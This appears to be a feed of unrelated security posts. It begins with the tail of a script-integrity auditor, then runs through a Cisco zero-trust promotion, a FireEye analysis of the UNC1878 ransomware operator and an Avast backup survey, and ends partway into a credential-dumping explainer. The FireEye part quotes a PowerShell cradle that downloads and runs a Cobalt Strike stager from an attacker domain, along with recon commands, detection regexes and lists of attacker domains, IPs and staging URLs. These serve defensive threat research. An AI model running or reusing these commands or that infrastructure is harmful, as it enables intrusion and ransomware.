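        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            # HTMLParser switches to CDATA mode for <script>, so the body
            # arrives through handle_data, possibly in several chunks.
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self.inline.append("".join(self._buf).strip())
            self._in_inline = False


def collect_scripts(html: str) -> Tuple[List[str], List[str]]:
    """Return (external src list, inline body list) for one HTML document."""
    p = ScriptCollector()
    p.feed(html)
    p.close()
    return p.external, p.inline


def _digest(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def build_baseline(html: str) -> Dict[str, Set[str]]:
    """Record every script src and the hash of every inline script body."""
    external, inline = collect_scripts(html)
    return {"external": set(external), "inline_hashes": {_digest(b) for b in inline}}


def audit_page(html: str, baseline: Dict[str, Set[str]]) -> List[Tuple[str, str]]:
    """Return (finding, detail) pairs for scripts absent from the baseline."""
    findings = []
    external, inline = collect_scripts(html)
    for src in external:
        if src not in baseline["external"]:
            findings.append(("unexpected-external-script", src))
    for body in inline:
        h = _digest(body)
        if h not in baseline["inline_hashes"]:
            findings.append(("modified-inline-script", "sha256:" + h[:16]))
    return findings


if __name__ == "__main__":
    base = build_baseline(BASELINE_HTML)
    for finding, detail in audit_page(CURRENT_HTML, base):
        print(finding, detail)
```

Same-origin paths are compared exactly rather than by host because, in the campaign above, the injected script was hosted on one of the compromised sites themselves; a host allow-list alone would have let it through. The baseline has to be refreshed through the normal deployment process, otherwise every legitimate change shows up as a finding.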

Pierluigi Paganini

(SecurityAffairs – Holy Water, malware)

The post Holy water targets religious figures and charities in Asia appeared first on Security Affairs.

Zero chance of tackling zero trust without a platform approach

Zero trust has gone mainstream. Everyone’s either promoting the concept, offering solutions to address the challenge, or just wanting to understand what it’s all about. And that’s the trouble: it means different things to different people, especially the word “trust,” which is a loaded term in security.

Just as we don’t trust hackers and cybercriminals, we do want to trust our employees, contractors, and business partners, don’t we? How do we succeed in business, after all, without trusting our users and guests to seamlessly access our data and resources?

That’s actually where zero trust comes in. We permit users to access the resources they need to get their jobs done. We try to stay out of our users’ way when we can. And we don’t do so blindly. We put safeguards in place to make sure users don’t leverage their access for wrongdoing, and that outsiders don’t usurp that access to carry out attacks.

As discussed on a recent security podcast, while zero trust is not new, it is now moving from the realm of hype to a pragmatic, accepted standard. In fact, Cisco was recently named a leader in the 2019 Forrester Zero Trust Wave.

Don’t let just anyone into your home…

Think of it this way. We choose to let certain visitors into our homes, but we don’t let just anybody in. We make sure we know them first, or that they can prove they’re from the plumbing company we called, for example.

We have security cameras so we can watch what people are doing when they approach our home and door. We have locks on our doors, and fences and gates around our yards, so we can decide who gets in and out. And when people do come in, we often confine them to certain areas of the house.

In a nutshell, that’s what zero trust is for our computing environments. It’s a comprehensive approach to securing access across your networks, applications, and infrastructure – including access from users, computers, phones, IoT devices, cloud applications, and more.

Amidst today’s complex computing environment, security teams are losing visibility into and control over who and what is accessing their networks and data. According to our 2020 CISO Benchmark Report, 52 percent of respondents find mobile devices very or extremely challenging to defend. And, 52 percent also said that it is very or extremely challenging to secure data stored in the public cloud.

Traditional security solutions were based on the concept of a finite network perimeter. But with the evolution of today’s workplace, the perimeter has changed due to the introduction of technologies like cloud, mobile, and the internet of things (IoT). We can no longer base security on the location from which an access request originates – because today’s users and devices are everywhere.

Cisco Zero Trust

By verifying the validity of every access request, no matter which user, location, or device it comes from, zero trust ensures that only the right users and devices get access and sharply limits an attacker’s ability to move laterally across the network. However, not all zero trust models are created equal.

Cisco Zero Trust protects your workforce, workloads, and workplace.

Some zero trust solutions focus on just one component of your ecosystem, while Cisco Zero Trust offers comprehensive security across your workforce, workloads, and workplace, and dynamically adjusts to address new levels of risk. Cisco also extends zero trust across our security portfolio, and to third-party technologies, to enhance visibility and policy enforcement across your entire infrastructure.

In other words, your home security measures can protect your house and yard, but can they also secure the people, appliances, and other objects in and around your home?

Main components of Cisco Zero Trust

Zero trust is a framework and way of doing security, versus a single product or solution. That’s why vendors who want to sell you a single product to solve your zero trust challenges should be looked at with suspicion. Zero trust takes the precise coordination of people, processes, and technology to do it right. The key pillars of Cisco’s zero trust strategy include the following:

Secure your workforce

Duo Security secures your workforce, ensuring that only the right users and devices can access applications. It helps protect your users and their devices against stolen credentials, phishing, and other identity-based attacks. And, it verifies users’ identities and establishes device trust before granting access to applications – from any location.

According to Vivian Ho, Software Engineer at Lyft, “My team’s main objective is to design and build tools and services that help keep Lyft’s infrastructure and data safe, and we believe Duo is a trusted partner in this journey…we see Duo serving as a core technology building block to enable our zero trust security philosophy.”

Protect your workload

Cisco Tetration protects your workloads, securing all connections within your applications across data centers and multi-cloud environments. It contains breaches and minimizes lateral movement through application micro-segmentation.

“Tetration gives me 20/20 vision in the data center,” said Eugene Pretorius, CIO of Infrastructure and Security at First National Bank. “It’s the only tool in the world that can show what is happening across the network, application, and server planes all on one screen.”

Defend your workplace

Cisco SD-Access segments your workplace, securing user and device connections across your network, including for IoT devices like cameras, manufacturing equipment, heart pumps, and more.

“With Cisco SD-Access, we can automate and apply segmentation and security policies to our network devices up to 10 times faster than before,” said Frank Weiler, who heads up the networking department for the City of Luxembourg.

Cisco SecureX – A platform approach to zero trust

The above technologies work together, and with other Cisco and third-party technologies, through our platform approach to security – SecureX. Today’s security professionals can no longer get by with siloed technologies. With SecureX, the whole is greater than the sum of its parts as multiple security technologies are integrated to share information and work together as a team. Ninety-five percent of customers say SecureX is valuable for helping them take action and remediate threats.

Cisco SecureX is the industry’s broadest, most integrated security platform.

Much like the security sensors on the windows in your home can trigger an alarm, which alerts your home security provider, who can call the police – SecureX seamlessly unifies visibility, enables automation, and strengthens security across network, endpoint, cloud, and applications. It’s all about greater simplicity and better security.

At the heart of our platform approach is the belief that security solutions should learn from one another and respond as a coordinated unit. And, that security should be built in versus bolted on, making it more holistic and effective. With this kind of strategy, implementing zero trust becomes less of a manual, onerous process, and more of an invisible, yet powerful means of protecting your environment – reducing the attack surface and accelerating incident response.

Get started with zero trust

Protect your network like you protect your home. Go to cisco.com/go/zero-trust and cisco.com/go/securex for further details.

The post Zero chance of tackling zero trust without a platform approach appeared first on Cisco Blogs.

It’s Your Money and They Want It Now — The Cycle of Adversary Pursuit

When we discover new intrusions, we ask ourselves questions that will help us understand the totality of the activity set.

How common is this activity? Is there anything unique or special about this malware or campaign? What is new and what is old in terms of TTPs or infrastructure? Is this being seen anywhere else? What information do I have that substantiates the nature of this threat actor?

To track a fast-moving adversary over time, we exploit organic intrusion data, pivot to other data sets, and make that knowledge actionable for analysts and incident responders, enabling new discoveries and assessments on the actor. The FireEye Advanced Practices team exists to know more about the adversary than anyone else, and by asking and answering questions such as these, we enable analyst action in security efforts. In this blog post, we highlight how our cycle of identification, expansion, and discovery was used to track a financially motivated actor across FireEye’s global data sets.

Identification

On January 29, 2020, FireEye Managed Defense investigated multiple TRICKBOT deployments against a U.S. based client. Shortly after initial deployment, TRICKBOT’s networkDll module ran the following network reconnaissance commands (Figure 1).

ipconfig /all
net config workstation
net view /all
net view /all /domain
nltest /domain_trusts
nltest /domain_trusts /all_trusts

Figure 1: Initial Reconnaissance

Approximately twenty minutes after reconnaissance, the adversary ran a PowerShell command to download and execute a Cobalt Strike HTTPS BEACON stager in memory (Figure 2).

cmd.exe /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxps://cylenceprotect[.]com:80/abresgbserthgsbabrt'))"

Figure 2: PowerShell download cradle used to request a Cobalt Strike stager

Six minutes later, Managed Defense identified evidence of enumeration and attempted lateral movement through the BEACON implant. Managed Defense alerted the client of the activity and the affected hosts were contained, stopping the intrusion in its tracks. A delta of approximately forty-six minutes between a TRICKBOT infection and attempted lateral movement was highly unusual and, along with the clever masquerade domain, warranted further examination by our team.
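The recon burst in Figure 1 followed by the download cradle in Figure 2 is a sequence a detection engineer can write rules for. The Python below is an added example and not part of the FireEye post: it runs two checks over constructed process-creation events (Sysmon Event ID 1 style records; the host names, the parent path winnetsvc.exe and the timings are invented), flagging any parent process that launches three or more distinct recon techniques from Figure 1 within five minutes, and any PowerShell command line that combines IEX with a download primitive, as in Figure 2. The defanged URL from Figure 2 is reused as sample data.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Recon commands from Figure 1, normalized to a label so that "net view /all" and
# "net view /all /domain" count as one technique rather than two.
RECON_PATTERNS = {
    "ipconfig": re.compile(r"^ipconfig(\.exe)?\s+/all", re.I),
    "net_config": re.compile(r"^net1?(\.exe)?\s+config\s+workstation", re.I),
    "net_view": re.compile(r"^net1?(\.exe)?\s+view\b", re.I),
    "nltest_trusts": re.compile(r"^nltest(\.exe)?\s+/domain_trusts", re.I),
}

# Download-cradle indicators modelled on Figure 2: all three REQUIRED patterns must hit.
CRADLE_REQUIRED = [
    re.compile(r"powershell(\.exe)?", re.I),
    re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b", re.I),
]
CRADLE_EXTRA = {  # optional indicators that raise confidence
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no-profile": re.compile(r"-nop(rofile)?\b", re.I),
    "https-on-port-80": re.compile(r"h(xx|tt)ps://[^/\s'\"]+:80\b", re.I),
}


def classify_recon(cmd: str):
    """Return the recon label for a command line, or None. Strips a leading path/quotes."""
    cmd = re.sub(r'^"?(?:[A-Za-z]:\\[^"\s]*\\)?([^"\s]+)"?', r"\1", cmd.strip())
    for label, pat in RECON_PATTERNS.items():
        if pat.search(cmd):
            return label
    return None


def find_recon_bursts(events, window=timedelta(minutes=5), min_distinct=3):
    """Flag a parent process that runs >= min_distinct recon techniques within `window`."""
    groups = defaultdict(list)
    for e in events:
        label = classify_recon(e["cmd"])
        if label:
            groups[(e["host"], e["parent"])].append((e["ts"], label))
    bursts = []
    for (host, parent), items in groups.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            seen = {lab for ts, lab in items[i:] if ts - start <= window}
            if len(seen) >= min_distinct:
                bursts.append({"host": host, "parent": parent, "start": start, "commands": sorted(seen)})
                break  # one finding per parent is enough for triage
    return bursts


def find_download_cradles(events):
    """Flag PowerShell command lines that fetch and execute remote code in memory."""
    hits = []
    for e in events:
        if all(p.search(e["cmd"]) for p in CRADLE_REQUIRED):
            extras = [name for name, p in CRADLE_EXTRA.items() if p.search(e["cmd"])]
            hits.append({"host": e["host"], "ts": e["ts"], "parent": e["parent"], "indicators": extras})
    return hits


# Constructed sample telemetry (not real logs). Timings follow the post's narrative:
# the recon burst, then the cradle about twenty minutes later. The parent path is invented.
_T0 = datetime(2020, 1, 29, 14, 0, 0)
_TRICKBOT = r"C:\Users\jdoe\AppData\Roaming\winnetsvc.exe"


def _ev(seconds, host, parent, cmd):
    return {"ts": _T0 + timedelta(seconds=seconds), "host": host, "parent": parent, "cmd": cmd}


SAMPLE_EVENTS = [
    _ev(0, "WS01", _TRICKBOT, "ipconfig /all"),
    _ev(2, "WS01", _TRICKBOT, "net config workstation"),
    _ev(4, "WS01", _TRICKBOT, r"C:\Windows\system32\net.exe view /all"),
    _ev(5, "WS01", _TRICKBOT, '"C:\\Windows\\system32\\net1.exe" view /all /domain'),
    _ev(7, "WS01", _TRICKBOT, "nltest /domain_trusts"),
    _ev(9, "WS01", _TRICKBOT, "nltest /domain_trusts /all_trusts"),
    _ev(1200, "WS01", _TRICKBOT,
        'cmd.exe /c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient)'
        ".downloadstring('hxxps://cylenceprotect[.]com:80/abresgbserthgsbabrt'))\""),
    # An admin running two commands an hour apart should not trip the burst rule.
    _ev(30, "WS02", r"C:\Windows\explorer.exe", "ipconfig /all"),
    _ev(3600, "WS02", r"C:\Windows\explorer.exe", "net view"),
]

if __name__ == "__main__":
    for b in find_recon_bursts(SAMPLE_EVENTS):
        print("RECON BURST", b)
    for c in find_download_cradles(SAMPLE_EVENTS):
        print("DOWNLOAD CRADLE", c)
```

The burst rule keys on the (host, parent process) pair rather than on individual commands, because ipconfig or net view on their own are routine; it is the number of distinct techniques in a short window from one parent that is characteristic. The cradle rule treats https on port 80, -nop and -w hidden as confidence boosters rather than requirements, since operators vary those flags between campaigns.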

Although light, indicators from this intrusion were distinct enough to create an uncategorized threat group, referred to as UNC1878. At the time of initial clustering, UNC1878’s intent was not fully understood due to the rapid containment of the intrusion by Managed Defense. By creating this label, we are able to link activity from the Managed Defense investigation into a single entity, allowing us to expand our understanding of this group and track their activity over time. This is especially important when dealing with campaigns involving mass malware, as it helps delineate the interactive actor from the malware campaign they are leveraging. For more information on our clustering methodology, check out our post about how we analyze, separate, or merge these clusters at scale.

Expansion

Pivoting on the command and control (C2) domain allowed us to begin building a profile of UNC1878 network infrastructure. WHOIS records for cylenceprotect[.]com (Figure 3) revealed that the domain was registered on January 27, 2020, with the registrar "Hosting Concepts B.V. d/b/a Openprovider", less than two days before we saw this domain used in activity impacting the Managed Defense customer.

Domain Name: cylenceprotect.com
Registry Domain ID: 2485487352_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.registrar.eu
Registrar URL: http://www.registrar.eu
Updated Date: 2020-01-28T00:35:43Z
Creation Date: 2020-01-27T23:32:18Z
Registrar Registration Expiration Date: 2021-01-27T23:32:18Z
Registrar: Hosting Concepts B.V. d/b/a Openprovider

Figure 3: WHOIS record for the domain cylenceprotect[.]com

Turning our attention to the server, the domain resolved to 45.76.20.140, an IP address owned by the VPS provider Choopa. In addition, the domain used self-hosted name servers ns1.cylenceprotect[.]com and ns2.cylenceprotect[.]com, which also resolved to the Choopa IP address. Network scan data for the server uncovered a certificate on port 80 and 443, a snippet of which can be seen in Figure 4.

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            03:a8:60:02:c7:dd:7f:88:5f:2d:86:0d:88:41:e5:3e:25:f0
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
        Validity
            Not Before: Jan 28 02:02:14 2020 GMT
            Not After : Apr 27 02:02:14 2020 GMT
        Subject: CN=cylenceprotect[.]com

Figure 4: TLS Certificate for the domain cylenceprotect[.]com

The certificate was issued by Let’s Encrypt, with the earliest validity date within 24 hours of the activity detected by Managed Defense, substantiating the speed at which this threat actor operates. Along with the certificate in Figure 4, we also identified the default generated, self-signed Cobalt Strike team server certificate (Figure 5) on port 54546 (the team server listens on 50050 by default).

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1843990795 (0x6de9110b)
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=Earth, ST=Cyberspace, L=Somewhere, O=cobaltstrike, OU=AdvancedPenTesting, CN=Major Cobalt Strike
        Validity
            Not Before: Jan 28 03:06:30 2020 GMT
            Not After : Apr 27 03:06:30 2020 GMT
        Subject: C=Earth, ST=Cyberspace, L=Somewhere, O=cobaltstrike, OU=AdvancedPenTesting, CN=Major Cobalt Strike

Figure 5: Default Cobalt Strike TLS Certificate used by UNC1878

Similar to the certificate on port 80 and 443, the earliest validity date was again within 24 hours of the intrusion identified by Managed Defense. Continuing analysis on the server, we acquired the BEACON stager and subsequent BEACON payload, which was configured to use the Amazon malleable C2 profile.

While these indicators may not hold significant weight on their own, together they create a recognizable pattern to fuel proactive discovery of related infrastructure. We began hunting for servers that exhibited the same characteristics as those used by UNC1878. Using third-party scan data, we quickly identified additional servers that matched a preponderance of UNC1878 tradecraft:

  • Domains typically comprised of generic IT or security related terms such as “update”, “system”, and “service”.
  • Domains registered with “Hosting Concepts B.V. d/b/a Openprovider" as early as December 19, 2019.
  • Self-hosted name servers.
  • Let’s Encrypt certificates on port 80.
  • Virtual private servers hosted predominantly by Choopa.
  • BEACON payloads configured with the Amazon malleable C2 profile.
  • Cobalt Strike Team Servers on non-standard ports.

Along with certificates matching UNC1878 tradecraft, we also found self-signed Armitage certificates, indicating this group may use multiple offensive security tools.
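The seven traits above can be turned into a simple scoring routine. The Python below is an added example and not FireEye’s tooling: it defines a scan-record structure (the field names are assumptions about what passive DNS, WHOIS and port-scan data would supply), scores each record against the traits, and returns the domains that match a preponderance of them. The first sample record reproduces the observations made about cylenceprotect[.]com in Figures 3 to 5; the second is a constructed benign server used as a negative control. The default Cobalt Strike DN is taken from Figure 5, and the keyword list extends “update”, “system” and “service” with terms drawn from the domain IOCs at the end of the post.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Subject/issuer DN of the default self-signed Cobalt Strike team server certificate (Figure 5).
CS_DEFAULT_DN = ("C=Earth, ST=Cyberspace, L=Somewhere, O=cobaltstrike, "
                 "OU=AdvancedPenTesting, CN=Major Cobalt Strike")
CS_DEFAULT_PORT = 50050
UNC1878_REGISTRAR = "Hosting Concepts B.V. d/b/a Openprovider"
# "update", "system" and "service" are the terms named in the text; the rest are taken from
# the domain IOCs listed in the post (win*, *defen*, *protect, *secur*, check*, *booster, *helper).
GENERIC_TERMS = ("update", "system", "service", "win", "defen", "protect",
                 "secur", "check", "booster", "helper")


@dataclass
class ScanRecord:
    """One server as seen in passive DNS, WHOIS and port-scan data (field names are assumptions)."""
    domain: str
    registrar: str
    nameservers: List[str]
    hosting_org: str
    certs: Dict[int, Tuple[str, str]] = field(default_factory=dict)  # port -> (issuer DN, subject DN)
    beacon_profile: Optional[str] = None  # malleable C2 profile parsed from a recovered BEACON config


def score_record(rec: ScanRecord) -> Tuple[int, List[str]]:
    """Count how many of the seven UNC1878 infrastructure traits a record exhibits."""
    hits = []
    label = rec.domain.lower().rsplit(".", 1)[0]          # drop the TLD
    if any(t in label for t in GENERIC_TERMS):
        hits.append("generic-it-term-in-domain")
    if rec.registrar == UNC1878_REGISTRAR:
        hits.append("openprovider-registrar")
    if rec.nameservers and all(ns.lower().endswith("." + rec.domain.lower()) for ns in rec.nameservers):
        hits.append("self-hosted-nameservers")
    issuer80, _ = rec.certs.get(80, ("", ""))
    if "let's encrypt" in issuer80.lower():
        hits.append("letsencrypt-cert-on-port-80")
    if "choopa" in rec.hosting_org.lower():
        hits.append("choopa-vps")
    if (rec.beacon_profile or "").lower() == "amazon":
        hits.append("amazon-malleable-c2-profile")
    for port, (issuer, subject) in rec.certs.items():
        if issuer == subject == CS_DEFAULT_DN and port != CS_DEFAULT_PORT:
            hits.append(f"default-cs-teamserver-cert-on-{port}")
            break
    return len(hits), hits


def hunt(records: List[ScanRecord], threshold: int = 4) -> List[str]:
    """Return domains matching a preponderance (>= threshold of 7) of the traits."""
    return [r.domain for r in records if score_record(r)[0] >= threshold]


LETSENCRYPT_X3 = "C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3"

# Record 1 reproduces the post's observations for cylenceprotect[.]com (Figures 3-5).
# Record 2 is a constructed benign server used as a negative control.
SAMPLE_RECORDS = [
    ScanRecord(
        domain="cylenceprotect.com",
        registrar=UNC1878_REGISTRAR,
        nameservers=["ns1.cylenceprotect.com", "ns2.cylenceprotect.com"],
        hosting_org="Choopa",
        certs={80: (LETSENCRYPT_X3, "CN=cylenceprotect.com"),
               443: (LETSENCRYPT_X3, "CN=cylenceprotect.com"),
               54546: (CS_DEFAULT_DN, CS_DEFAULT_DN)},
        beacon_profile="amazon",
    ),
    ScanRecord(
        domain="example-corp.com",
        registrar="Example Registrar Inc.",
        nameservers=["ns1.dnshost.example", "ns2.dnshost.example"],
        hosting_org="Example Cloud Ltd.",
        certs={443: ("CN=Example Public CA", "CN=example-corp.com")},
    ),
]

if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        print(rec.domain, *score_record(rec))
    print("candidates:", hunt(SAMPLE_RECORDS))
```

The threshold of four out of seven is an assumption; in practice the team server certificate and the Amazon profile carry more weight than a generic domain name, so a weighted score, or treating the certificate match as sufficient on its own, is reasonable. The registrar and Let’s Encrypt traits also describe a great deal of legitimate infrastructure, which is why no single trait should fire an alert.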

Pivoting on limited indicators extracted from a single Managed Defense intrusion, a small cluster of activity was expanded into a more diverse set of indicators cardinal to UNC1878. While the objective and goal of this threat actor had not yet manifested, the correlation of infrastructure allowed our team to recognize this threat actor’s operations against other customers.

Discovery

With an established modus operandi for UNC1878, our team quickly identified several related intrusions in support of FireEye Mandiant investigations over the next week. Within two days of our initial clustering and expansion of UNC1878 from the original Managed Defense investigation, Mandiant Incident Responders were investigating activity at a U.S. based medical equipment company with several indicators we had previously identified and attributed to UNC1878. Attributed domains, payloads and methodologies provided consultants with a baseline to build detections on, as well as a level of confidence in the actor’s capabilities and the speed at which they operate.

Three days later, UNC1878 was identified during another incident response engagement at a restaurant chain. In this engagement, Mandiant consultants found evidence of attempted deployment of RYUK ransomware on hundreds of systems, finally revealing UNC1878’s desired end goal. In the following weeks, we continued to encounter UNC1878 in various phases of their intrusions at several Mandiant Incident Response and Managed Defense customers.

While services data offers us a depth of understanding into these intrusions, we turn to our product telemetry to understand the breadth of activity, getting a better worldview and perspective on the global prevalence of this threat actor. This led to the discovery of an UNC1878 intrusion at a technology company, resulting in Mandiant immediately notifying the affected customer. By correlating multiple UNC1878 intrusions across our services and product customers, it became evident that the targeting was indiscriminate, a common characteristic of opportunistic ransomware campaigns.

Although initially there were unanswered questions surrounding UNC1878’s intent, we were able to provide valuable insights into their capabilities to our consultants and analysts. In turn, the intrusion data gathered during these engagements continued the cycle of building our understanding of UNC1878’s tradecraft, enabling our responders to handle these incidents swiftly in the face of imminent ransomware deployment.

Conclusion

Threat actors continue to use mass malware campaigns to establish footholds into target environments, followed by interactive operations focused on deploying ransomware such as RYUK, DOPPELPAYMER and MAZE. Looking at the overall trend of intrusions FireEye responds to, the growing shift from traditional payment card (PCI) data theft to ransomware has allowed threat actors such as UNC1878 to widen their scope and increase their tempo, costing organizations millions of dollars in business disruption and ransom payments. However, apart from their speed, UNC1878 does not stand out among the increasing number of groups following this trend, and that should not be the key takeaway of this blog post.

The cycle of analysis and discovery used for UNC1878 lies at the core of our team’s mission to rapidly detect and pursue impactful adversaries at scale. Starting from a singular intrusion at a Managed Defense client, we were able to discover UNC1878 activity at multiple customers. Using our analysis of the early stages of their activity allowed us to pivot and pursue this actor across otherwise unrelated investigations. As we refine and expand our understanding of UNC1878’s tradecraft, our team enables Mandiant and Managed Defense to efficiently identify, respond to, and eradicate a financially motivated threat actor whose end goal could cripple targeted organizations. The principles applied in pursuit of this actor are crucial to tracking any adversary and are ultimately how the Advanced Practices team surfaces meaningful activity across the FireEye ecosystem.

Acknowledgements

Thank you to Andrew Thompson, Dan Perez, Steve Miller, John Gorman and Brendan McKeague for technical review of this content. In addition, thank you to the frontline responders harvesting valuable intrusion data that enables our research.

Indicators of Compromise

Domains

  • aaatus[.]com
  • avrenew[.]com
  • besttus[.]com
  • bigtus[.]com
  • brainschampions[.]com
  • checkwinupdate[.]com
  • ciscocheckapi[.]com
  • cleardefencewin[.]com
  • cmdupdatewin[.]com
  • comssite[.]com
  • conhostservice[.]com
  • cylenceprotect[.]com
  • defenswin[.]com
  • easytus[.]com
  • findtus[.]com
  • firsttus[.]com
  • freeallsafe[.]com
  • freeoldsafe[.]com
  • greattus[.]com
  • havesetup[.]net
  • iexploreservice[.]com
  • jomamba[.]best
  • livecheckpointsrs[.]com
  • livetus[.]com
  • lsassupdate[.]com
  • lsasswininfo[.]com
  • microsoftupdateswin[.]com
  • myservicebooster[.]com
  • myservicebooster[.]net
  • myserviceconnect[.]net
  • myserviceupdater[.]com
  • myyserviceupdater[.]com
  • renovatesystem[.]com
  • service-updater[.]com
  • servicesbooster[.]com
  • servicesbooster[.]org
  • servicesecurity[.]org
  • serviceshelpers[.]com
  • serviceupdates[.]net
  • serviceuphelper[.]com
  • sophosdefence[.]com
  • target-support[.]online
  • taskshedulewin[.]com
  • timesshifts[.]com
  • topsecurityservice[.]net
  • topservicehelper[.]com
  • topservicesbooster[.]com
  • topservicesecurity[.]com
  • topservicesecurity[.]net
  • topservicesecurity[.]org
  • topservicesupdate[.]com
  • topservicesupdates[.]com
  • topserviceupdater[.]com
  • update-wind[.]com
  • updatemanagir[.]us
  • updatewinlsass[.]com
  • updatewinsoftr[.]com
  • web-analysis[.]live
  • windefenceinfo[.]com
  • windefens[.]com
  • winsysteminfo[.]com
  • winsystemupdate[.]com
  • worldtus[.]com
  • yoursuperservice[.]com

IP Addresses

  • 31.7.59.141
  • 45.32.30.162
  • 45.32.130.5
  • 45.32.161.213
  • 45.32.170.9
  • 45.63.8.219
  • 45.63.95.187
  • 45.76.20.140
  • 45.76.167.35
  • 45.76.231.195
  • 45.77.58.172
  • 45.77.89.31
  • 45.77.98.157
  • 45.77.119.212
  • 45.77.153.72
  • 45.77.206.105
  • 63.209.33.131
  • 66.42.97.225
  • 66.42.99.79
  • 79.124.60.117
  • 80.240.18.106
  • 81.17.25.210
  • 95.179.147.215
  • 95.179.210.8
  • 95.179.215.228
  • 96.30.192.141
  • 96.30.193.57
  • 104.156.227.250
  • 104.156.245.0
  • 104.156.250.132
  • 104.156.255.79
  • 104.238.140.239
  • 104.238.190.126
  • 108.61.72.29
  • 108.61.90.90
  • 108.61.176.237
  • 108.61.209.123
  • 108.61.242.184
  • 140.82.5.67
  • 140.82.10.222
  • 140.82.27.146
  • 140.82.60.155
  • 144.202.12.197
  • 144.202.83.4
  • 149.28.15.247
  • 149.28.35.35
  • 149.28.50.31
  • 149.28.55.197
  • 149.28.81.19
  • 149.28.113.9
  • 149.28.122.130
  • 149.28.246.25
  • 149.248.5.240
  • 149.248.56.113
  • 149.248.58.11
  • 151.106.56.223
  • 155.138.135.182
  • 155.138.214.247
  • 155.138.216.133
  • 155.138.224.221
  • 207.148.8.61
  • 207.148.15.31
  • 207.148.21.17
  • 207.246.67.70
  • 209.222.108.106
  • 209.250.255.172
  • 216.155.157.249
  • 217.69.15.175

BEACON Staging URLs

  • hxxp://104.156.255[.]79:80/avbcbgfyhunjmkmk
  • hxxp://149.28.50[.]31:80/adsrxdfcffdxfdsgfxzxds
  • hxxp://149.28.81[.]19:80/ajdlkashduiqwhuyeu12312g3yugshdahqjwgye1g2uy31u1
  • hxxp://45.32.161[.]213:80/ephfusaybuzabegaexbkakskjfgksajgbgfckskfnrdgnkhdsnkghdrngkhrsngrhgcngyggfxbgufgenwfxwgfeuyenfgx
  • hxxp://45.63.8[.]219:80/ajhgfrtyujhytr567uhgfrt6y789ijhg
  • hxxp://66.42.97[.]225:80/aqedfy345yu9876red45f6g78j90
  • hxxp://findtus[.]com/akkhujhbjcjcjhufuuljlvu
  • hxxp://thedemocraticpost[.]com/kflmgkkjdfkmkfl
  • hxxps://brainschampions[.]com:443/atrsgrtehgsetrh5ge
  • hxxps://ciscocheckapi[.]com:80/adsgsergesrtvfdvsa
  • hxxps://cylenceprotect[.]com:80/abresgbserthgsbabrt
  • hxxps://havesetup[.]net/afgthyjuhtgrfety
  • hxxps://servicesbooster[.]org:443/sfer4f54
  • hxxps://servicesecurity[.]org:443/fuhvbjk
  • hxxps://timesshifts[.]com:443/akjhtyrdtfyguhiugyft
  • hxxps://timesshifts[.]com:443/ry56rt6yh5rth
  • hxxps://update-wind[.]com/aergerhgrhgeradgerg
  • hxxps://updatemanagir[.]us:80/afvSfaewfsdZFAesf

#WorldBackupDay: Only 58% of Brits Back Up Their Data

Over four in ten British people don't back up their data, even though most of them know how to do it.

New research by Avast published today to coincide with World BackUp Day found that 42% of Brits do not back up their data and files. 

Of those running the gauntlet of data loss in the event of theft, infection, accidental deletion, or destruction, 52% said they didn't keep any information on their device that was important enough to back up.

Other Brits who don't back up their data said that they had intended to get around to it but had not been successful. Of those, 10% said it had slipped their mind, while 13% said that they were too busy with other tasks to find time to back up. 

The remaining 26% of Brits throwing data preservation to the wind by not performing backups confessed that they hadn't bothered to find out how to carry out this simple task.

Of the Brits who do back up their data, 47% do so once a month, while 20% do so continuously and 17% perform a backup every 1 to 6 months.

While 39% of Brits who do actually back up their data do so to cloud storage, the most popular method, practiced by 59% of those surveyed, was to use an external hard drive. 

Android users showed a marked preference for using external hard drives over cloud storage for their backups, while iPhone users were only slightly more likely to choose an external hard drive over the cloud. 

"Losing personal documents, photos and videos can be a painful experience and it’s not until this happens that they realize how valuable it actually is,” said Luis Corrons, security evangelist at Avast. 

“It’s important to back up data on a regular basis, keeping memories, captured in the form of photos and videos, safe and secure.”

Avast researchers recommend backing up data regularly to two locations, in effect creating a backup backup. They also advise users backing up to an external hard drive to protect that drive from ransomware attacks by disconnecting it once the backup is complete. 

Stealing passwords with credential dumping

What’s the quickest way to access a computer? Logging in. As obvious as this may sound, it’s worth reflecting on this. Because while logging in is so second nature that you probably don’t give it much consideration, it’s also one of the most common techniques for taking over a computer.

From a malicious standpoint, stealing and using legitimate credentials to gain access is more likely to go undetected as an attacker attempts to move through a network. Dropping a trojan or exploiting a vulnerability can certainly gain you initial access, but authorized credentials help you navigate laterally under the radar.

It’s no wonder that login credentials are a primary target of bad actors. According to Verizon’s 2019 Data Breach Investigations Report, using stolen credentials was the second-most common activity conducted by attackers during a breach.

So how do bad actors go about stealing credentials? Some techniques are well known, others not as much.

The usual suspects

Phishing emails are by far the most popular method to steal credentials. As we’ve discussed in the past, the scams take many forms, from notifications that there’s a document online that you should view, to notifications of upgrades to your account.

Keyloggers—another common tool for stealing credentials—sit in the background and log keystrokes on a compromised computer. An attacker can load up a keylogger, then wait for it to record credentials as they are input into the computer.

